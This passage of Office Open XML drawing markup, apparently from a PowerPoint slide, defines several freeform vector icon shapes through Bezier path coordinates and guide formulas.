                      <a:pt x="29" y="25"/>
                      <a:pt x="29" y="27"/>
                      <a:pt x="27" y="28"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="27" y="28"/>
                      <a:pt x="25" y="28"/>
                      <a:pt x="23" y="28"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="61"/>
                      <a:pt x="35" y="61"/>
                      <a:pt x="35" y="6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5" y="28"/>
                      <a:pt x="34" y="28"/>
                      <a:pt x="34" y="28"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="27"/>
                      <a:pt x="32" y="25"/>
                      <a:pt x="34" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="25"/>
                      <a:pt x="39" y="25"/>
                      <a:pt x="42" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="25"/>
                      <a:pt x="51" y="25"/>
                      <a:pt x="51" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="25"/>
                      <a:pt x="53" y="27"/>
                      <a:pt x="51" y="28"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="51" y="28"/>
                      <a:pt x="49" y="28"/>
                      <a:pt x="47" y="28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62" y="51"/>
                      <a:pt x="62" y="51"/>
                      <a:pt x="62" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="47"/>
                      <a:pt x="64" y="43"/>
                      <a:pt x="64" y="41"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="43" y="45"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="72"/>
                      <a:pt x="34" y="72"/>
                      <a:pt x="34" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="73"/>
                      <a:pt x="40" y="73"/>
                      <a:pt x="43" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="73"/>
                      <a:pt x="50" y="73"/>
                      <a:pt x="53" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="53" y="71"/>
                      <a:pt x="53" y="71"/>
                      <a:pt x="53" y="71"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="43" y="45"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="71" y="28"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="29"/>
                      <a:pt x="71" y="30"/>
                      <a:pt x="71" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="34"/>
                      <a:pt x="70" y="37"/>
                      <a:pt x="69" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="69"/>
                      <a:pt x="59" y="69"/>
                      <a:pt x="59" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="64"/>
                      <a:pt x="75" y="54"/>
                      <a:pt x="75" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="37"/>
                      <a:pt x="73" y="32"/>
                      <a:pt x="71" y="28"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="43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6"/>
                      <a:pt x="19" y="85"/>
                      <a:pt x="43" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="85"/>
                      <a:pt x="85" y="66"/>
                      <a:pt x="85" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="19"/>
                      <a:pt x="66" y="0"/>
                      <a:pt x="43" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="43" y="79"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="79"/>
                      <a:pt x="6" y="63"/>
                      <a:pt x="6" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="22"/>
                      <a:pt x="22" y="5"/>
                      <a:pt x="43" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="5"/>
                      <a:pt x="80" y="22"/>
                      <a:pt x="80" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="80" y="63"/>
                      <a:pt x="63" y="79"/>
                      <a:pt x="43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4" name="Freeform 149">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFBE7CCF-2081-4F58-996C-C2E7DC751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8707" y="5621075"/>
                <a:ext cx="364063" cy="360148"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 110 w 114"/>
                  <a:gd name="T1" fmla="*/ 90 h 113"/>
                  <a:gd name="T2" fmla="*/ 60 w 114"/>
                  <a:gd name="T3" fmla="*/ 47 h 113"/>
                  <a:gd name="T4" fmla="*/ 64 w 114"/>
                  <a:gd name="T5" fmla="*/ 32 h 113"/>
                  <a:gd name="T6" fmla="*/ 32 w 114"/>
                  <a:gd name="T7" fmla="*/ 0 h 113"/>
                  <a:gd name="T8" fmla="*/ 23 w 114"/>
                  <a:gd name="T9" fmla="*/ 1 h 113"/>
                  <a:gd name="T10" fmla="*/ 41 w 114"/>
                  <a:gd name="T11" fmla="*/ 20 h 113"/>
                  <a:gd name="T12" fmla="*/ 41 w 114"/>
                  <a:gd name="T13" fmla="*/ 30 h 113"/>
                  <a:gd name="T14" fmla="*/ 30 w 114"/>
                  <a:gd name="T15" fmla="*/ 41 h 113"/>
                  <a:gd name="T16" fmla="*/ 20 w 114"/>
                  <a:gd name="T17" fmla="*/ 41 h 113"/>
                  <a:gd name="T18" fmla="*/ 1 w 114"/>
                  <a:gd name="T19" fmla="*/ 23 h 113"/>
                  <a:gd name="T20" fmla="*/ 0 w 114"/>
                  <a:gd name="T21" fmla="*/ 32 h 113"/>
                  <a:gd name="T22" fmla="*/ 32 w 114"/>
                  <a:gd name="T23" fmla="*/ 63 h 113"/>
                  <a:gd name="T24" fmla="*/ 47 w 114"/>
                  <a:gd name="T25" fmla="*/ 60 h 113"/>
                  <a:gd name="T26" fmla="*/ 90 w 114"/>
                  <a:gd name="T27" fmla="*/ 110 h 113"/>
                  <a:gd name="T28" fmla="*/ 100 w 114"/>
                  <a:gd name="T29" fmla="*/ 111 h 113"/>
                  <a:gd name="T30" fmla="*/ 111 w 114"/>
                  <a:gd name="T31" fmla="*/ 100 h 113"/>
                  <a:gd name="T32" fmla="*/ 110 w 114"/>
                  <a:gd name="T33" fmla="*/ 9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" h="113">
                    <a:moveTo>
                      <a:pt x="110" y="90"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="47"/>
                      <a:pt x="60" y="47"/>
                      <a:pt x="60" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="62" y="42"/>
                      <a:pt x="64" y="37"/>
                      <a:pt x="64" y="32"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="14"/>
                      <a:pt x="49" y="0"/>
                      <a:pt x="32" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="0"/>
                      <a:pt x="26" y="0"/>
                      <a:pt x="23" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="20"/>
                      <a:pt x="41" y="20"/>
                      <a:pt x="41" y="20"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="22"/>
                      <a:pt x="44" y="27"/>
                      <a:pt x="41" y="3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4"/>
                      <a:pt x="23" y="44"/>
                      <a:pt x="20" y="4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9"/>
                      <a:pt x="0" y="32"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="49"/>
                      <a:pt x="14" y="63"/>
                      <a:pt x="32" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="63"/>
                      <a:pt x="42" y="62"/>
                      <a:pt x="47" y="6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3" y="113"/>
                      <a:pt x="97" y="113"/>
                      <a:pt x="100" y="111"/>
                    </a:cubicBez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4" y="97"/>
                      <a:pt x="113" y="93"/>
                      <a:pt x="110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5" name="Freeform 150">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97D5AE0A-606C-4C3D-8F30-877755687F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0647" y="5274627"/>
                <a:ext cx="358192" cy="550009"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 84 w 112"/>
                  <a:gd name="T1" fmla="*/ 3 h 172"/>
                  <a:gd name="T2" fmla="*/ 111 w 112"/>
                  <a:gd name="T3" fmla="*/ 19 h 172"/>
                  <a:gd name="T4" fmla="*/ 110 w 112"/>
                  <a:gd name="T5" fmla="*/ 33 h 172"/>
                  <a:gd name="T6" fmla="*/ 103 w 112"/>
                  <a:gd name="T7" fmla="*/ 44 h 172"/>
                  <a:gd name="T8" fmla="*/ 65 w 112"/>
                  <a:gd name="T9" fmla="*/ 21 h 172"/>
                  <a:gd name="T10" fmla="*/ 72 w 112"/>
                  <a:gd name="T11" fmla="*/ 10 h 172"/>
                  <a:gd name="T12" fmla="*/ 84 w 112"/>
                  <a:gd name="T13" fmla="*/ 3 h 172"/>
                  <a:gd name="T14" fmla="*/ 0 w 112"/>
                  <a:gd name="T15" fmla="*/ 130 h 172"/>
                  <a:gd name="T16" fmla="*/ 1 w 112"/>
                  <a:gd name="T17" fmla="*/ 172 h 172"/>
                  <a:gd name="T18" fmla="*/ 38 w 112"/>
                  <a:gd name="T19" fmla="*/ 153 h 172"/>
                  <a:gd name="T20" fmla="*/ 98 w 112"/>
                  <a:gd name="T21" fmla="*/ 52 h 172"/>
                  <a:gd name="T22" fmla="*/ 60 w 112"/>
                  <a:gd name="T23" fmla="*/ 29 h 172"/>
                  <a:gd name="T24" fmla="*/ 0 w 112"/>
                  <a:gd name="T25" fmla="*/ 130 h 172"/>
                  <a:gd name="T26" fmla="*/ 76 w 112"/>
                  <a:gd name="T27" fmla="*/ 57 h 172"/>
                  <a:gd name="T28" fmla="*/ 30 w 112"/>
                  <a:gd name="T29" fmla="*/ 134 h 172"/>
                  <a:gd name="T30" fmla="*/ 20 w 112"/>
                  <a:gd name="T31" fmla="*/ 128 h 172"/>
                  <a:gd name="T32" fmla="*/ 66 w 112"/>
                  <a:gd name="T33" fmla="*/ 52 h 172"/>
                  <a:gd name="T34" fmla="*/ 76 w 112"/>
                  <a:gd name="T35" fmla="*/ 5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2" h="172">
                    <a:moveTo>
                      <a:pt x="84" y="3"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="96" y="0"/>
                      <a:pt x="108" y="7"/>
                      <a:pt x="111" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="112" y="24"/>
                      <a:pt x="112" y="29"/>
                      <a:pt x="110" y="33"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="44"/>
                      <a:pt x="103" y="44"/>
                      <a:pt x="103" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="21"/>
                      <a:pt x="65" y="21"/>
                      <a:pt x="65" y="21"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="10"/>
                      <a:pt x="72" y="10"/>
                      <a:pt x="72" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="7"/>
                      <a:pt x="79" y="4"/>
                      <a:pt x="84" y="3"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="0" y="130"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="172"/>
                      <a:pt x="1" y="172"/>
                      <a:pt x="1" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="153"/>
                      <a:pt x="38" y="153"/>
                      <a:pt x="38" y="153"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="98" y="52"/>
                      <a:pt x="98" y="52"/>
                      <a:pt x="98" y="52"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="29"/>
                      <a:pt x="60" y="29"/>
                      <a:pt x="60" y="29"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="130"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="76" y="57"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="134"/>
                      <a:pt x="30" y="134"/>
                      <a:pt x="30" y="134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66" y="52"/>
                      <a:pt x="66" y="52"/>
                      <a:pt x="66" y="52"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="7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6" name="Freeform 151">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{727DC0D6-0493-43E4-B465-47C1188221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89301" y="5294200"/>
                <a:ext cx="305343" cy="348404"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 40 w 95"/>
                  <a:gd name="T1" fmla="*/ 61 h 109"/>
                  <a:gd name="T2" fmla="*/ 34 w 95"/>
                  <a:gd name="T3" fmla="*/ 54 h 109"/>
                  <a:gd name="T4" fmla="*/ 13 w 95"/>
                  <a:gd name="T5" fmla="*/ 75 h 109"/>
                  <a:gd name="T6" fmla="*/ 34 w 95"/>
                  <a:gd name="T7" fmla="*/ 95 h 109"/>
                  <a:gd name="T8" fmla="*/ 40 w 95"/>
                  <a:gd name="T9" fmla="*/ 88 h 109"/>
                  <a:gd name="T10" fmla="*/ 27 w 95"/>
                  <a:gd name="T11" fmla="*/ 75 h 109"/>
                  <a:gd name="T12" fmla="*/ 40 w 95"/>
                  <a:gd name="T13" fmla="*/ 61 h 109"/>
                  <a:gd name="T14" fmla="*/ 54 w 95"/>
                  <a:gd name="T15" fmla="*/ 88 h 109"/>
                  <a:gd name="T16" fmla="*/ 61 w 95"/>
                  <a:gd name="T17" fmla="*/ 95 h 109"/>
                  <a:gd name="T18" fmla="*/ 81 w 95"/>
                  <a:gd name="T19" fmla="*/ 75 h 109"/>
                  <a:gd name="T20" fmla="*/ 61 w 95"/>
                  <a:gd name="T21" fmla="*/ 54 h 109"/>
                  <a:gd name="T22" fmla="*/ 54 w 95"/>
                  <a:gd name="T23" fmla="*/ 61 h 109"/>
                  <a:gd name="T24" fmla="*/ 68 w 95"/>
                  <a:gd name="T25" fmla="*/ 75 h 109"/>
                  <a:gd name="T26" fmla="*/ 54 w 95"/>
                  <a:gd name="T27" fmla="*/ 88 h 109"/>
                  <a:gd name="T28" fmla="*/ 89 w 95"/>
                  <a:gd name="T29" fmla="*/ 21 h 109"/>
                  <a:gd name="T30" fmla="*/ 74 w 95"/>
                  <a:gd name="T31" fmla="*/ 6 h 109"/>
                  <a:gd name="T32" fmla="*/ 59 w 95"/>
                  <a:gd name="T33" fmla="*/ 0 h 109"/>
                  <a:gd name="T34" fmla="*/ 8 w 95"/>
                  <a:gd name="T35" fmla="*/ 0 h 109"/>
                  <a:gd name="T36" fmla="*/ 0 w 95"/>
                  <a:gd name="T37" fmla="*/ 8 h 109"/>
                  <a:gd name="T38" fmla="*/ 0 w 95"/>
                  <a:gd name="T39" fmla="*/ 100 h 109"/>
                  <a:gd name="T40" fmla="*/ 8 w 95"/>
                  <a:gd name="T41" fmla="*/ 109 h 109"/>
                  <a:gd name="T42" fmla="*/ 86 w 95"/>
                  <a:gd name="T43" fmla="*/ 109 h 109"/>
                  <a:gd name="T44" fmla="*/ 95 w 95"/>
                  <a:gd name="T45" fmla="*/ 100 h 109"/>
                  <a:gd name="T46" fmla="*/ 95 w 95"/>
                  <a:gd name="T47" fmla="*/ 36 h 109"/>
                  <a:gd name="T48" fmla="*/ 89 w 95"/>
                  <a:gd name="T49" fmla="*/ 21 h 109"/>
                  <a:gd name="T50" fmla="*/ 84 w 95"/>
                  <a:gd name="T51" fmla="*/ 26 h 109"/>
                  <a:gd name="T52" fmla="*/ 85 w 95"/>
                  <a:gd name="T53" fmla="*/ 27 h 109"/>
                  <a:gd name="T54" fmla="*/ 68 w 95"/>
                  <a:gd name="T55" fmla="*/ 27 h 109"/>
                  <a:gd name="T56" fmla="*/ 68 w 95"/>
                  <a:gd name="T57" fmla="*/ 10 h 109"/>
                  <a:gd name="T58" fmla="*/ 69 w 95"/>
                  <a:gd name="T59" fmla="*/ 11 h 109"/>
                  <a:gd name="T60" fmla="*/ 84 w 95"/>
                  <a:gd name="T61" fmla="*/ 26 h 109"/>
                  <a:gd name="T62" fmla="*/ 88 w 95"/>
                  <a:gd name="T63" fmla="*/ 100 h 109"/>
                  <a:gd name="T64" fmla="*/ 86 w 95"/>
                  <a:gd name="T65" fmla="*/ 102 h 109"/>
                  <a:gd name="T66" fmla="*/ 8 w 95"/>
                  <a:gd name="T67" fmla="*/ 102 h 109"/>
                  <a:gd name="T68" fmla="*/ 6 w 95"/>
                  <a:gd name="T69" fmla="*/ 100 h 109"/>
                  <a:gd name="T70" fmla="*/ 6 w 95"/>
                  <a:gd name="T71" fmla="*/ 8 h 109"/>
                  <a:gd name="T72" fmla="*/ 8 w 95"/>
                  <a:gd name="T73" fmla="*/ 7 h 109"/>
                  <a:gd name="T74" fmla="*/ 59 w 95"/>
                  <a:gd name="T75" fmla="*/ 7 h 109"/>
                  <a:gd name="T76" fmla="*/ 61 w 95"/>
                  <a:gd name="T77" fmla="*/ 7 h 109"/>
                  <a:gd name="T78" fmla="*/ 61 w 95"/>
                  <a:gd name="T79" fmla="*/ 34 h 109"/>
                  <a:gd name="T80" fmla="*/ 88 w 95"/>
                  <a:gd name="T81" fmla="*/ 34 h 109"/>
                  <a:gd name="T82" fmla="*/ 88 w 95"/>
                  <a:gd name="T83" fmla="*/ 36 h 109"/>
                  <a:gd name="T84" fmla="*/ 88 w 95"/>
                  <a:gd name="T85" fmla="*/ 10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5" h="109">
                    <a:moveTo>
                      <a:pt x="40" y="61"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="54"/>
                      <a:pt x="34" y="54"/>
                      <a:pt x="34" y="54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34" y="95"/>
                      <a:pt x="34" y="95"/>
                      <a:pt x="34" y="95"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="88"/>
                      <a:pt x="40" y="88"/>
                      <a:pt x="40" y="88"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="27" y="75"/>
                      <a:pt x="27" y="75"/>
                      <a:pt x="27" y="75"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="40" y="61"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="54" y="88"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="61" y="95"/>
                      <a:pt x="61" y="95"/>
                      <a:pt x="61" y="95"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="75"/>
                      <a:pt x="81" y="75"/>
                      <a:pt x="81" y="75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68" y="75"/>
                      <a:pt x="68" y="75"/>
                      <a:pt x="68" y="75"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="54" y="88"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="89" y="21"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="6"/>
                      <a:pt x="74" y="6"/>
                      <a:pt x="74" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="3"/>
                      <a:pt x="64" y="0"/>
                      <a:pt x="5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5"/>
                      <a:pt x="3" y="109"/>
                      <a:pt x="8" y="109"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="86" y="109"/>
                      <a:pt x="86" y="109"/>
                      <a:pt x="86" y="109"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="109"/>
                      <a:pt x="95" y="105"/>
                      <a:pt x="95" y="100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5" y="31"/>
                      <a:pt x="92" y="24"/>
                      <a:pt x="89" y="21"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="84" y="26"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="84" y="26"/>
                      <a:pt x="85" y="27"/>
                      <a:pt x="85" y="27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10"/>
                      <a:pt x="68" y="10"/>
                      <a:pt x="69" y="11"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="84" y="26"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="88" y="100"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="88" y="101"/>
                      <a:pt x="87" y="102"/>
                      <a:pt x="86" y="102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7" y="102"/>
                      <a:pt x="6" y="101"/>
                      <a:pt x="6" y="100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60" y="7"/>
                      <a:pt x="60" y="7"/>
                      <a:pt x="61" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="61" y="34"/>
                      <a:pt x="61" y="34"/>
                      <a:pt x="61" y="34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8" y="34"/>
                      <a:pt x="88" y="35"/>
                      <a:pt x="88" y="36"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="88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7" name="Freeform 152">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BCA41AE-0394-4151-81AC-607BDF2A88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29505" y="1945211"/>
                <a:ext cx="401253" cy="297514"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 101 w 125"/>
                  <a:gd name="T1" fmla="*/ 0 h 93"/>
                  <a:gd name="T2" fmla="*/ 23 w 125"/>
                  <a:gd name="T3" fmla="*/ 0 h 93"/>
                  <a:gd name="T4" fmla="*/ 0 w 125"/>
                  <a:gd name="T5" fmla="*/ 23 h 93"/>
                  <a:gd name="T6" fmla="*/ 0 w 125"/>
                  <a:gd name="T7" fmla="*/ 70 h 93"/>
                  <a:gd name="T8" fmla="*/ 23 w 125"/>
                  <a:gd name="T9" fmla="*/ 93 h 93"/>
                  <a:gd name="T10" fmla="*/ 101 w 125"/>
                  <a:gd name="T11" fmla="*/ 93 h 93"/>
                  <a:gd name="T12" fmla="*/ 125 w 125"/>
                  <a:gd name="T13" fmla="*/ 70 h 93"/>
                  <a:gd name="T14" fmla="*/ 125 w 125"/>
                  <a:gd name="T15" fmla="*/ 23 h 93"/>
                  <a:gd name="T16" fmla="*/ 101 w 125"/>
                  <a:gd name="T17" fmla="*/ 0 h 93"/>
                  <a:gd name="T18" fmla="*/ 47 w 125"/>
                  <a:gd name="T19" fmla="*/ 78 h 93"/>
                  <a:gd name="T20" fmla="*/ 47 w 125"/>
                  <a:gd name="T21" fmla="*/ 15 h 93"/>
                  <a:gd name="T22" fmla="*/ 86 w 125"/>
                  <a:gd name="T23" fmla="*/ 46 h 93"/>
                  <a:gd name="T24" fmla="*/ 47 w 125"/>
                  <a:gd name="T25" fmla="*/ 7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5" h="93">
                    <a:moveTo>
                      <a:pt x="101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83"/>
                      <a:pt x="11" y="93"/>
                      <a:pt x="23" y="93"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="93"/>
                      <a:pt x="101" y="93"/>
                      <a:pt x="101" y="93"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="114" y="93"/>
                      <a:pt x="125" y="83"/>
                      <a:pt x="125" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="125" y="23"/>
                      <a:pt x="125" y="23"/>
                      <a:pt x="125" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="125" y="10"/>
                      <a:pt x="114" y="0"/>
                      <a:pt x="101" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="47" y="78"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="15"/>
                      <a:pt x="47" y="15"/>
                      <a:pt x="47" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="86" y="46"/>
                      <a:pt x="86" y="46"/>
                      <a:pt x="86" y="46"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="47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8" name="Freeform 153">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C1EF13F-6351-4AA3-B380-6B605E3F30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34302" y="4360555"/>
                <a:ext cx="207477" cy="211391"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 61 w 65"/>
                  <a:gd name="T1" fmla="*/ 19 h 66"/>
                  <a:gd name="T2" fmla="*/ 47 w 65"/>
                  <a:gd name="T3" fmla="*/ 4 h 66"/>
                  <a:gd name="T4" fmla="*/ 51 w 65"/>
                  <a:gd name="T5" fmla="*/ 0 h 66"/>
                  <a:gd name="T6" fmla="*/ 65 w 65"/>
                  <a:gd name="T7" fmla="*/ 15 h 66"/>
                  <a:gd name="T8" fmla="*/ 61 w 65"/>
                  <a:gd name="T9" fmla="*/ 19 h 66"/>
                  <a:gd name="T10" fmla="*/ 57 w 65"/>
                  <a:gd name="T11" fmla="*/ 23 h 66"/>
                  <a:gd name="T12" fmla="*/ 55 w 65"/>
                  <a:gd name="T13" fmla="*/ 46 h 66"/>
                  <a:gd name="T14" fmla="*/ 10 w 65"/>
                  <a:gd name="T15" fmla="*/ 66 h 66"/>
                  <a:gd name="T16" fmla="*/ 6 w 65"/>
                  <a:gd name="T17" fmla="*/ 63 h 66"/>
                  <a:gd name="T18" fmla="*/ 24 w 65"/>
                  <a:gd name="T19" fmla="*/ 45 h 66"/>
                  <a:gd name="T20" fmla="*/ 26 w 65"/>
                  <a:gd name="T21" fmla="*/ 46 h 66"/>
                  <a:gd name="T22" fmla="*/ 32 w 65"/>
                  <a:gd name="T23" fmla="*/ 39 h 66"/>
                  <a:gd name="T24" fmla="*/ 26 w 65"/>
                  <a:gd name="T25" fmla="*/ 33 h 66"/>
                  <a:gd name="T26" fmla="*/ 20 w 65"/>
                  <a:gd name="T27" fmla="*/ 39 h 66"/>
                  <a:gd name="T28" fmla="*/ 21 w 65"/>
                  <a:gd name="T29" fmla="*/ 42 h 66"/>
                  <a:gd name="T30" fmla="*/ 3 w 65"/>
                  <a:gd name="T31" fmla="*/ 59 h 66"/>
                  <a:gd name="T32" fmla="*/ 0 w 65"/>
                  <a:gd name="T33" fmla="*/ 56 h 66"/>
                  <a:gd name="T34" fmla="*/ 20 w 65"/>
                  <a:gd name="T35" fmla="*/ 10 h 66"/>
                  <a:gd name="T36" fmla="*/ 43 w 65"/>
                  <a:gd name="T37" fmla="*/ 8 h 66"/>
                  <a:gd name="T38" fmla="*/ 57 w 65"/>
                  <a:gd name="T3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5" h="66">
                    <a:moveTo>
                      <a:pt x="61" y="19"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="4"/>
                      <a:pt x="47" y="4"/>
                      <a:pt x="47" y="4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1" y="19"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="57" y="23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37" y="46"/>
                      <a:pt x="10" y="66"/>
                      <a:pt x="10" y="66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5" y="45"/>
                      <a:pt x="25" y="46"/>
                      <a:pt x="26" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="46"/>
                      <a:pt x="32" y="43"/>
                      <a:pt x="32" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="36"/>
                      <a:pt x="30" y="33"/>
                      <a:pt x="26" y="33"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="33"/>
                      <a:pt x="20" y="36"/>
                      <a:pt x="20" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="20" y="40"/>
                      <a:pt x="20" y="41"/>
                      <a:pt x="21" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="59"/>
                      <a:pt x="3" y="59"/>
                      <a:pt x="3" y="59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20" y="29"/>
                      <a:pt x="20" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="8"/>
                      <a:pt x="43" y="8"/>
                      <a:pt x="43" y="8"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="57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19" name="Freeform 154">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98FAB4C0-872D-4975-ABB3-09BE296B2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0535" y="4113931"/>
